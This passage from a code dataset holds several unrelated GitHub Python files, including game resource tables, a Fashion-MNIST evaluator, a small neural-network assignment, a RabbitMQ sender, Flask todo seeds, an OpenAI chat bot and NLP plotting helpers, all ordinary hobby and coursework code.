\"jewels\"]\n\n\ncommon_resources = [\"timber\",\n \"wool\",\n \"iron\"]\n\nfood_resources = [\"cattle\",\n \"wheat\",\n \"fruit\",\n \"fish\",\n \"shellfish\"]\n\nall_resources = food_resources + common_resources + rare_resources\n\nall_artikels = []\n\n\nmountain = {\"taiga\": [\"iron\", \"silver\", \"gold\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\nlow_mountain = {\"taiga\": [\"iron\", \"silver\", \"gold\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\nhill = {\"taiga\": [\"iron\", \"silver\", \"jewels\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": 
[\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\nlow_hill = {\"taiga\": [\"iron\", \"silver\", \"jewels\"],\n \"tundra\": [\"iron\", \"silver\"],\n \"snowy tundra\": [\"iron\", \"silver\"],\n \"alpine\": [\"iron\", \"silver\"],\n \"grassland\": [\"iron\", \"silver\", \"gold\"],\n \"plains\": [\"iron\", \"silver\", \"gold\"],\n \"wet plains\": [\"iron\", \"silver\", \"gold\"],\n \"savannah\": [\"iron\", \"silver\", \"gold\"],\n \"desert\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"forest\": [\"iron\", \"silver\", \"gold\"],\n \"conifer\": [\"iron\", \"silver\", \"gold\"],\n \"jungle\": [\"iron\", \"silver\", \"gold\"],\n \"snowpack\": [\"iron\", \"silver\"],\n \"ice\": [None],\n \"shrubland\": [\"iron\", \"silver\", \"gold\", \"jewels\"],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\n\nvegetation = {\"taiga\": [\"wool\", \"pelts\", \"iron\", \"silver\"],\n \"tundra\": [\"pelts\", \"silver\"],\n \"snowy tundra\": [\"pelts\"],\n \"alpine\": [\"timber\", \"pelts\", \"iron\"],\n \"grassland\": [\"cattle\", \"wool\", \"wheat\", \"iron\", \"silver\"],\n \"plains\": [\"saffron\", \"cinnamon\", \"cattle\", \"wheat\"],\n \"wet plains\": [\"cinnamon\", \"cattle\", \"wheat\"],\n \"savannah\": [\"ivory\", \"cinnamon\", \"gold\"],\n \"desert\": [\"gold\", \"jewels\"],\n \"forest\": [\"timber\", \"pelts\"],\n \"conifer\": [\"timber\", \"pelts\"],\n \"jungle\": [\"clove\", \"timber\", \"fruit\"],\n \"snowpack\": [None],\n \"ice\": [None],\n \"shrubland\": [\"wool\", \"silver\", \"iron\", \"jewels\"],\n \"ocean\": [\"ivory\", \"fish\"],\n \"sea\": [\"fish\", \"shellfish\"],\n \"shallows\": [\"fish\", \"shellfish\"],\n \"lake\": [\"fish\"]}\n\nriver = {\"taiga\": [None],\n \"tundra\": [None],\n \"snowy tundra\": [None],\n \"alpine\": [None],\n \"grassland\": [None],\n \"plains\": [None],\n \"wet plains\": [None],\n \"savannah\": [None],\n \"desert\": [None],\n \"forest\": [None],\n \"conifer\": [None],\n \"jungle\": [None],\n \"snowpack\": [None],\n \"ice\": [None],\n \"shrubland\": [None],\n \"ocean\": [None],\n \"sea\": [None],\n \"shallows\": [None],\n \"lake\": [None]}\n\n\npossible_resources = {\"river\": river,\n \"vegetation\": vegetation,\n \"low hill\": low_hill,\n \"hill\": hill,\n \"low mountain\": low_mountain,\n \"mountain\": mountain}\n\n\nclass Resource(object):\n biomes_allowed = {}\n terrain_allowed = {}\n\n\nclass Artikel(object):\n\n biome_production = {}\n terrain_production = {}\n","repo_name":"z-van-baars/tradewinds","sub_path":"artikel.py","file_name":"artikel.py","file_ext":"py","file_size_in_byte":6918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"70750255734","text":"import os\nimport sys\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom sklearn.metrics import accuracy_score\n\nmodel_path = '/content/Fashion-MNIST_sq.h5'\ntest_path = '/content/fashion_mnist_data/fashion-mnist_test.csv'\nmodel = keras.models.load_model(model_path)\n\ndef load_and_preprocess_test_data(test_folder):\n df = pd.read_csv(test_folder)\n y = df.iloc[:,0]\n X = df.iloc[:, 1: ]\n\n return X, y\n\ndef evaluate_model(model_path, test_path):\n correct_predictions = 0\n X, y = load_and_preprocess_test_data(test_path)\n total_examples = len(X)\n y_true = []\n y_pred = []\n\n # Iterate through all test examples\n for i in range(total_examples):\n 
test_example = X.iloc[i].to_numpy() # Get the feature values for the i-th test example\n test_example = test_example.reshape(1, 784) # Reshape for prediction\n\n # Make a prediction\n pred = model.predict(test_example)\n \n # Get the predicted class index\n predicted_class_index = np.argmax(pred[0])\n \n # Get the actual class label (ground truth)\n actual_class_label = y.iloc[i]\n y_pred.append(predicted_class_index)\n y_true.append(actual_class_label)\n\n \n\n # Calculate the accuracy\n accuracy = accuracy_score(y_true, y_pred)\n return accuracy\n\n\n\ndef main():\n # Parse command-line arguments\n parser = argparse.ArgumentParser(description=\"Model Evaluation\")\n parser.add_argument('--model_path', type=str, required=True, help=\"Path to the trained model\")\n parser.add_argument('--test_file', type=str, required=True, help=\"Path to the file containing test data\")\n args = parser.parse_args()\n\n model_path = args.model_path\n test_folder = args.test_file\n\n try:\n accuracy = evaluate_model(model_path, test_folder)\n # model_summary = model.summary()\n # model_summary = str(model_summary)\n accuracy = str(accuracy)\n\n # Create and write to the output.txt file\n with open('output.txt', 'w') as output_file:\n output_file.write(\"Model Architecture:\\n\")\n model_summary = model.summary(print_fn=lambda x: output_file.write(x + '\\n'))\n output_file.write(f\"Test Accuracy: {accuracy}\\n\")\n output_file.write(\"\\nAdditional Insights and observations:\\n\")\n output_file.write(\"\\n1. The dataset's remarkable class balance with approximately 7,000 samples\\nper class minimizes the risk of underfitting or overfitting,\\nensuring a robust foundation for model training.\\n\")\n output_file.write(\"\\n2. Reshaping the 784-pixel images was a crucial preprocessing step,\\nenhancing data compatibility and model training efficiency.\\n\")\n output_file.write(\"\\n3. Recognizing visually similar classes like pullovers, coats, and shirts\\ncan be challenging. In these cases, leveraging human expertise in a human-in-the-loop approach\\ncan improve model accuracy.\\n\")\n output_file.write(\"\\n4. Future work can focus on refining the model, integrating more features,\\nand further engaging human expertise to advance sustainable apparel classification.\\n\")\n print(\"Model evaluation completed. 
Results written to output.txt.\")\n    except FileNotFoundError:\n        print(\"Error: The provided folder doesn't exist or is empty.\")\n        sys.exit(1)\n    except Exception as e:\n        print(f\"An error occurred: {str(e)}\")\n        sys.exit(1)\n\nif __name__ == '__main__':\n    main()\n    sys.exit(0)\n\n\n\n","repo_name":"sasori-s/Fashion-MNIST","sub_path":"evaluate_model.py","file_name":"evaluate_model.py","file_ext":"py","file_size_in_byte":3541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39798916324","text":"import itertools\ndef solution(baseball):\n    answer = 0\n    length = len(baseball)\n    number = list(itertools.permutations([1, 2, 3, 4, 5, 6, 7, 8, 9], 3))\n    for i in number:\n        cnt = 0\n        for v in baseball:\n            string = str(v[0])\n            tmp0, tmp1, tmp2 = int(string[0]), int(string[1]), int(string[2])\n            strike = 0\n            ball = 0\n            if i[0] == tmp0:\n                strike += 1\n            if i[1] == tmp1:\n                strike += 1\n            if i[2] == tmp2:\n                strike += 1\n            if i[0] == tmp1 or i[0] == tmp2:\n                ball += 1\n            if i[1] == tmp0 or i[1] == tmp2:\n                ball += 1\n            if i[2] == tmp0 or i[2] == tmp1:\n                ball += 1\n            if strike == v[1] and ball == v[2]:\n                cnt += 1\n            else:\n                break\n        if cnt == length:\n            answer += 1\n    return answer\n\nbaseball = [[123, 1, 1], [356, 1, 0], [327, 2, 0], [489, 0, 1]]\nprint(solution(baseball))\n","repo_name":"cheol-95/Algorithm","sub_path":"Python/066. 숫자야구/Number Baseball.py","file_name":"Number Baseball.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14113677112","text":"#!/usr/bin/env python\nimport pika\n\nclass Sender():\n\n    def send_msg(self, msg, name):\n        connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\n        channel = connection.channel()\n        channel.queue_declare(queue=name)\n        channel.basic_publish(exchange='',\n                              routing_key=name,\n                              body=msg)\n        connection.close()\n","repo_name":"cperiz/trending_hashtags","sub_path":"lib/async_sender.py","file_name":"async_sender.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33468278307","text":"\n#Section2_1layerNN.py\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport math\n# load the images\n\ndef load_images():\n    images = os.listdir('./data')\n    X = []\n    Y = np.load('label.npy')\n    #load the images\n    for i in range(1200):\n        #The image is in shape(28,28,3) width=28, height=28, channel(RGB) = 3\n        #R=G=B since the figure is gray\n        image = cv2.imread('./data/%d.png'%(i+1)).astype('uint8')\n        \n        # Scale the image down (or up) so that it fits our model (input size: 20*20*1)\n        image = cv2.resize(image,(20,20),interpolation=cv2.INTER_AREA)\n        X.append(image)\n    X = np.array(X)\n    return X,Y\n\ndef one_hot(label):\n    one_hot_label = [0]*26\n    one_hot_label[label] = 1\n    return one_hot_label \n\ndef load_data():\n    X,Y = load_images()\n    X = (X.sum(axis=3)//3)/255\n    X = X.reshape(X.shape[0],-1) # flatten each image into a row vector of length 20*20 = 400\n    Y = np.array(list(map(one_hot,Y)))\n    return X,Y\n\n# utils.py\n# define the tanh activator and its gradient (derivative) for backpropagation\nclass tanhActivator(object):\n    def forward(self, weighted_input):\n        return np.tanh(weighted_input)\n    \n    def backward(self, output):\n        return 1-output**2\n    \n#layer.py\n\nclass FullConnectedLayer():\n    def __init__(self, input_size, output_size, \n                 activator):\n        self.input_size = input_size\n        self.output_size = 
output_size\n        self.activator = activator\n        self.W = np.random.uniform(-0.1, 0.1,\n            (output_size, input_size))\n        \n        self.b = np.random.uniform(-0.1,0.1,(output_size, 1))\n\n        \n        self.y = np.zeros((output_size, 1))\n    def forward(self, x):\n        self.x = x\n        self.y = self.activator.forward(\n            np.dot(self.W, x) + self.b)\n    \n    def backward(self, delta_array):\n        '''\n        Your task 1\n        - calculate the Gradient in Eq.1\n        - (refer to the 2nd term in Eq.1)\n        '''\n        \n        # ****** Your code begin (task 1) ******\n        # self.W_grad = the dot product of delta_array and the transpose of self.x\n        self.W_grad = np.dot(delta_array,self.x.T)\n        self.b_grad = delta_array\n        # ****** Your code end (task 1) ******\n        \n        # Don't touch other code\n        self.delta = self.activator.backward(self.x) * np.dot(\n            self.W.T, delta_array)\n    def update(self, learning_rate):\n        # Eq.1 in Sec. 2.4\n        self.W += learning_rate * self.W_grad\n        self.b += learning_rate * self.b_grad\n\n\nclass Network():\n    def __init__(self, input_size,output_size):\n        self.layer =FullConnectedLayer(\n            input_size, output_size,\n            tanhActivator()\n        )\n    def __str__(self):\n        np.set_printoptions(threshold=np.inf)\n        # this network has a single layer, so report its weights and bias\n        result = 'W1 = np.{0}'.format(repr(self.layer.W)) + '\\n\\n'\n        result += 'b1 = np.{0}'.format(repr(self.layer.b)) + '\\n\\n'\n        return result\n        \n    def forward(self, x):\n        self.layer.forward(x)\n        y = self.layer.y\n        return y\n    \n    def train(self, X, Y, epoch=100,learning_rate=0.01):\n        for i in range(epoch):\n            success_case = 0\n            # decay the learning rate as training progresses (compare the loop index i, not the total epoch count)\n            if i == 400:\n                learning_rate /=10\n            if i == 800:\n                learning_rate /= 10\n            for d in range(len(X)):\n                y = self.train_one_sample(X[d], \n                    Y[d], learning_rate)\n                if np.argmax(y) == np.argmax(Y[d]):\n                    success_case+=1\n\n            if (i%5 ==0):\n                success_case_val = 0\n                for d in range(len(val_X)):\n                    # classify each image as the letter with the highest output activation\n                    if np.argmax(val_Y[d]) == np.argmax(model.forward(val_X[d])):\n                        success_case_val += 1\n                accuracy_val = success_case_val/len(val_X)*100\n                print('accuracy in validation dataset is %.2f %%'%accuracy_val)\n            \n            accuracy = success_case/len(X)*100\n            print('epoch %d:'%i,end='')\n            print('accuracy in training is %.2f %%'%accuracy)\n            if accuracy >= 100-1e-5:\n                break\n    \n    def train_one_sample(self, x, y, learning_rate):\n        output = self.forward(x)\n        self.calc_gradient(y)\n        self.update_weight(learning_rate)\n        return output\n    def calc_gradient(self, label):\n        delta = self.layer.activator.backward(\n            self.layer.y\n        ) * (label - self.layer.y)\n        self.layer.backward(delta)\n    def update_weight(self, learning_rate):\n        self.layer.update(learning_rate)\n\ndef data_processing():\n    \n    X,Y = load_data()\n    train_X,train_Y = X[:1000],Y[:1000]\n    val_X,val_Y = X[1000:1200],Y[1000:1200]\n    train_X = train_X.reshape((*train_X.shape,1))\n    train_Y = train_Y.reshape((*train_Y.shape,1))\n    val_X = val_X.reshape((*val_X.shape,1))\n    val_Y = val_Y.reshape((*val_Y.shape,1))\n    #amount_of_c_in_train = train_Y.sum()\n    #amount_of_c_in_val =val_Y.sum()\n    #print('amount_of_c_in_train=%d'%amount_of_c_in_train)\n    #print('amount_of_c_in_val=%d'%amount_of_c_in_val)\n    return train_X,train_Y,val_X,val_Y\n\nif __name__ == '__main__':\n    train_X,train_Y,val_X,val_Y = data_processing()\n    model = Network(train_X.shape[1],train_Y.shape[1])\n    \n    #training\n    epochs = 1000\n    learning_rate = 0.01\n    model.train(train_X,train_Y,epochs,learning_rate)\n    #validation\n    success_case = 0\n    for i in range(len(val_X)):\n        # classify each image as the letter with the highest output activation\n        if np.argmax(val_Y[i]) == 
np.argmax(model.forward(val_X[i])):\n            success_case += 1\n    accuracy = success_case/len(val_X)*100\n    print('accuracy in validation dataset is %.2f %%'%accuracy)\n    \n\n","repo_name":"0xyk/CISC7201-2021Autumn-University-of-Macau","sub_path":"Mini-Project 02_Handwriting-Recognition_NN/section2_1layerNN.py","file_name":"section2_1layerNN.py","file_ext":"py","file_size_in_byte":6001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8482240291","text":"from sklearn.cluster import SpectralClustering\nfrom sklearn.datasets._samples_generator import make_blobs\nimport matplotlib.pyplot as plt\nfrom sklearn.datasets import make_circles\nimport sklearn.cluster as skl_cluster\nimport numpy as np\nnp.set_printoptions(precision=3)\nn = 10\nk = 3\nd = 2\nnp.random.seed(1)\n# X, _ = make_blobs(n_samples=400, centers=4, cluster_std=1)\n# print(X[0][0])\n# plt.scatter(X[:, 0], X[:, 1])\n# plt.show()\n#\n# sc = SpectralClustering(n_clusters=4, n_init=1).fit(X)\n# print(len(sc.labels_))\n# labels = sc.labels_\n# plt.scatter(X[:, 0], X[:, 1], c=labels)\n# plt.show()\n# f = plt.figure()\n# f.add_subplot(2, 2, 1)\n# for i in range(2, 6):\n#     sc = SpectralClustering(n_clusters=i).fit(X)\n#     f.add_subplot(2, 2, i - 1)\n#     plt.scatter(X[:, 0], X[:, 1], s=5, c=sc.labels_, label=\"n_cluster-\" + str(i))\n#     plt.legend()\n# plt.show()\n# X, y = make_blobs(n_samples=10, centers=3, n_features=2, random_state=0)\n# print(X)\n# print(y)\n# X, y = make_blobs(n_samples=[3, 3, 4], centers=None, n_features=2, random_state=0)\n# print(X)\n# print(y)\n# first\n# X, _ = make_blobs(n_samples=n, centers=k, n_features=d, shuffle=True, random_state=31)\n# with open(\"input_1.txt\", mode=\"w\", encoding = 'utf-8') as f:\n#     for dp in X:\n#         for i in range(d):\n#             f.write(f\"{dp[i]:.3f}\")\n#             if i != d - 1:\n#                 f.write(\",\")\n#         f.write(\"\\n\")\ncircles, circles_clusters = make_circles(n_samples=400, noise=.01, random_state=0)\n\n# cluster with kmeans\nKmean = skl_cluster.KMeans(n_clusters=2)\nKmean.fit(circles)\nclusters = Kmean.predict(circles)\n\n# plot the data, colouring it by cluster\nplt.scatter(circles[:, 0], circles[:, 1], s=15, linewidth=0.1, c=clusters,cmap='flag')\nplt.show()\n\n# cluster with spectral clustering\nmodel = skl_cluster.SpectralClustering(n_clusters=2, affinity='nearest_neighbors', assign_labels='kmeans')\nlabels = model.fit_predict(circles)\nplt.scatter(circles[:, 0], circles[:, 1], s=15, linewidth=0, c=labels, cmap='flag')\nplt.show()\n\n\n\n","repo_name":"ram-elgov/NSC_Normalized_Spectral_Clustering_C_API","sub_path":"src/sklearn_nsc.py","file_name":"sklearn_nsc.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32593441883","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nimport tqdm\r\n\r\n\r\ndef merge_au_txt(au_names_list, root_au_path, save_path,logits=False):\r\n    aulist = [1, 2, 4, 6, 7, 10, 12, 15, 23, 24, 25, 26]\r\n    for au_name in tqdm.tqdm(au_names_list):\r\n        for au_txts in os.listdir(os.path.join(root_au_path, au_name)):\r\n            count = []\r\n            for i in au_names_list:\r\n                data = pd.read_csv(os.path.join(root_au_path, i, au_txts))\r\n                label = data.loc[:, [i.split('-')[0].upper()]].values\r\n                if len(count) == 0:\r\n                    count = label\r\n                else:\r\n                    count = np.concatenate((count, label), axis=1)\r\n            df = pd.DataFrame(count.tolist(), columns=[\"AU\" + str(j) for j in aulist])\r\n            if logits:\r\n                if not 
os.path.exists(os.path.join(save_path, 'val_merge_logits_txt')):\r\n os.makedirs(os.path.join(save_path, 'val_merge_logits_txt'))\r\n df.to_csv(os.path.join(save_path, 'val_merge_logits_txt', f'{au_txts}'), index=None)\r\n else:\r\n if not os.path.exists(os.path.join(save_path, 'val_merge_txt')):\r\n os.makedirs(os.path.join(save_path, 'val_merge_txt'))\r\n df.to_csv(os.path.join(save_path, 'val_merge_txt', f'{au_txts}'), index=None)\r\n\r\n\r\nif __name__ == '__main__':\r\n au_names_list = ['AU1',\r\n 'AU2',\r\n 'AU4',\r\n 'AU6',\r\n 'AU7',\r\n 'AU10',\r\n 'AU12',\r\n 'AU15',\r\n 'AU23',\r\n 'AU24',\r\n 'AU25',\r\n 'AU26',\r\n ]\r\n # merge_au_txt(au_names_list,\r\n # '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/abaw_situ_data_our_label_smooth_result/val_result/',\r\n # '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/abaw_situ_data_our_label_smooth_result/',\r\n # False)\r\n merge_au_txt(au_names_list,\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/val_logits_result/',\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/',\r\n True)\r\n merge_au_txt(au_names_list,\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/val_result/',\r\n '/root/autodl-tmp/qfs/ABAW_Competition_0324/0324_val_result/submit_res100/',\r\n False)\r\n","repo_name":"situAI/ABAW2022_AU_SituTech","sub_path":"ensemble/merge_model_au_txt.py","file_name":"merge_model_au_txt.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73766520054","text":"from app.models import db, Todo, environment, SCHEMA\n\ndef seed_todo():\n todo1 = Todo(\n writer_id=1,\n title='Todo 1',\n description='denist at 5 PM'\n )\n todo2 = Todo(\n writer_id=1,\n title='Todo 2',\n description='denist at 5 PM'\n )\n todo3 = Todo(\n writer_id=1,\n title='Todo 3',\n description='go to new york to visit the city once more!'\n )\n todo4 = Todo(\n writer_id=1,\n title='Todo 4',\n description='buy plane tickets back to Cali'\n )\n todo5 = Todo(\n writer_id=1,\n title='Todo 5',\n description='pick up medicine from CVS/Target'\n )\n todo6 = Todo(\n writer_id=1,\n title='Todo 6', \n description='go to costco for groceries'\n\n )\n todo7 = Todo(\n writer_id=1,\n title='Todo 7',\n description='clean room before end of the week'\n )\n todo8 = Todo(\n writer_id=1,\n title='Todo 8',\n description='finish homework and then playing val'\n )\n todo9 = Todo(\n writer_id=1,\n title='Todo 9',\n description='doing laundry and cooking dinner before 6PM'\n )\n todo10 = Todo(\n writer_id=1,\n title='Todo 10',\n # description='business working meeting at 12:30PM'\n )\n db.session.add_all([todo1, todo2, todo3, todo4, todo5,\n todo6, todo7, todo8, todo9, todo10])\n db.session.commit()\n\n\n\n\n\ndef undo_todo():\n\n if environment == \"production\":\n db.session.execute(\n f\"TRUNCATE table {SCHEMA}.todos RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(\"DELETE FROM todos\")\n\n db.session.commit()","repo_name":"evnxprk/sanri0-note","sub_path":"app/seeds/todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43978390753","text":"import openai\nimport main,db\n\nwith open('secret.env', 'r') as file:\n openai.api_key = file.read()\nprint(openai.api_key)\n\ndef fourComplete(prompt,temp=0.8):\n completion = openai.ChatCompletion.create(\n 
model=\"gpt-4\",\n messages=[\n {\"role\": \"system\", \"content\": \"You are a wholesome World of Warcraft helper bot.\"},\n {\"role\": \"user\", \"content\": prompt}\n ],\n temperature=temp,\n request_timeout=120\n )\n return completion.choices[0].message.content\n \ndef eulogize(name):\n if db.check_for_character(name) == None:\n response = fourComplete(\"Write a humorous error message explaining that you couldn't find a character named: \"+name)\n else:\n data = main.fetch_euology_data(name)\n response = fourComplete(f\"Write a one paragraph eulogy for {data['name']}, a {data['race']} {data['spec']} {data['class']}, who resided in {data['realm']}. (use {data['gender'].lower()} pronouns)\")\n return response","repo_name":"NoahHummus/wow-ilvl-bot","sub_path":"chatgptPy.py","file_name":"chatgptPy.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40129993364","text":"\r\n\r\na=2\r\nb=1\r\ns=0\r\nfor i in range(0,20):\r\n\ts+=a/b\r\n\tt=a\r\n\ta=a+b\r\n\tb=t\r\nprint (s)\r\n\r\n\r\n\r\n#!/usr/bin/python\r\n# -*- coding: UTF-8 -*-\r\n\r\ns=0\r\ndef fact(n):\r\n\tif n==1:\r\n\t\treturn 1\r\n\treturn n*fact(n-1)\r\n\r\nfor n in range(1,3):\r\n a=fact(n)\r\n s+=a\r\nprint(\"结果是:\",s)\r\n\r\n\r\n\r\n\r\ndef Factorial(n):\r\n if n == 1:\r\n fn=1\r\n else:\r\n fn = n*Factorial(n-1)\r\n return fn\r\nprint(\"Factorial(5)=\",Factorial(5))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"zhouli01/python_test01","sub_path":"sum_fen.py","file_name":"sum_fen.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8776168438","text":"import os\nimport json\nfrom typing import Dict, List, Optional, Union, cast\nimport requests\nimport re\nimport unicodedata\nimport pandas as pd\n\nfrom bs4 import BeautifulSoup\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport json\n# import acquire\nimport prepare\nimport wrangle as w\n\nfrom env import github_token, github_username\nimport nltk\nfrom nltk.tokenize.toktok import ToktokTokenizer\nfrom nltk.corpus import stopwords\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\ndf=pd.read_json('data2.json')\n\n#Question 1\ndef viz_most_common_unigrams(words):\n '''takes in words, get top 5 unigram words, plot bar graph of top 5 unigram words'''\n \n words_unigrams = pd.Series(nltk.ngrams(words.split(), 1))\n top_5_words = words_unigrams.value_counts().head(5)\n ax = top_5_words.sort_values().plot.barh(color='pink', width=.9, figsize=(10, 6))\n\n plt.title('5 Most frequently occuring words unigrams')\n plt.ylabel('unigram')\n plt.xlabel('# Occurances')\n ax.spines[['right', 'top']].set_visible(False)\n\n\n # make the labels pretty\n ticks, _ = plt.yticks()\n labels = top_5_words.sort_values().reset_index()['index'].apply(lambda t: t[0])\n _ = plt.yticks(ticks, labels)\n \n\ndef viz_most_common_bigrams(words):\n '''takes in words, get top 5 bigram words, plot bar graph of top 5 bigram words'''\n \n words_bigrams = pd.Series(nltk.ngrams(words.split(), 2))\n top_5_words = words_bigrams.value_counts().head(5)\n ax = top_5_words.sort_values().plot.barh(color='pink', width=.9, figsize=(10, 6))\n\n plt.title('5 Most frequently occuring words bigrams')\n plt.ylabel('Bigram')\n plt.xlabel('# Occurances')\n ax.spines[['right', 'top']].set_visible(False)\n\n # make the labels pretty\n 
ticks, _ = plt.yticks()\n    labels = top_5_words.sort_values().reset_index()['index'].apply(lambda t: t[0] + ' ' + t[1])\n    _ = plt.yticks(ticks, labels)\n    \ndef viz_most_common_trigrams(words):\n    '''takes in words, gets the top 5 trigrams, and plots a bar graph of them'''\n    \n    words_trigrams = pd.Series(nltk.ngrams(words.split(), 3))\n    top_5_words = words_trigrams.value_counts().head(5)\n    ax = top_5_words.sort_values().plot.barh(color='pink', width=.9, figsize=(10, 6))\n\n    plt.title('5 most frequently occurring trigrams')\n    plt.ylabel('Trigram')\n    plt.xlabel('# Occurrences')\n    ax.spines[['right', 'top']].set_visible(False)\n\n\n    # make the labels pretty\n    ticks, _ = plt.yticks()\n    labels = top_5_words.sort_values().reset_index()['index'].apply(lambda t: t[0] + ' ' + t[1] + ' ' + t[2])\n    _ = plt.yticks(ticks, labels)\n\ndef Q1(train):\n    words = w.clean_text(' '.join(train['readme_contents_clean']))\n    viz_most_common_unigrams(words)\n    plt.show()\n    viz_most_common_bigrams(words)\n    plt.show()\n    viz_most_common_trigrams(words)\n    plt.show()\n    \n    \n#Question 2 \ndef viz_length_content(train):\n    '''takes in a dataframe, plots a bar graph of the length of README content by programming language'''\n    \n    ax = sns.barplot(data=train, x='length',y='language', orient='h' ,order=['JavaScript', 'Java', 'Python', 'C++'])\n    avg_length = train.length.mean()\n    plt.axvline(avg_length , label=\"Avg Length\", color='purple')\n    plt.legend()\n    ax.legend(loc='upper left', bbox_to_anchor=(1, 1))\n    plt.ylabel('Programming Language')\n    plt.xlabel('Length')\n    plt.xlim(0,12000)\n    plt.title('Variation of length of README by programming language')\n    ax.spines[['right', 'top']].set_visible(False)\n    plt.show()\n\n#Question 3 \ndef viz_count_unique(train):\n    '''takes in a dataframe, plots a bar graph of the number of unique words by programming language'''\n\n    \n    ax = sns.barplot(data=train, x='unique',y='language' ,orient='h', order=[ 'Java','Python','JavaScript','C++'])\n    plt.ylabel('Programming Language')\n    plt.xlabel('Unique Words')\n#    plt.xlim(30,40)\n    plt.title('Variation of number of unique words by programming language')\n    ax.spines[['right', 'top']].set_visible(False)\n    plt.show()\n\n\n","repo_name":"JDSINLP/NLP-Project","sub_path":"explore.py","file_name":"explore.py","file_ext":"py","file_size_in_byte":4092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31293918942","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nfrom matplotlib import pyplot as plt\nimport matplotlib\nfrom sklearn import preprocessing\nimport os\nimport numpy as np\nimport random as rd\nimport tensorflow as tf \ntf.compat.v1.disable_eager_execution()\nsess = tf.compat.v1.InteractiveSession()\nfrom scipy.integrate import odeint\nimport pickle\nfrom sklearn.preprocessing import StandardScaler\nfrom 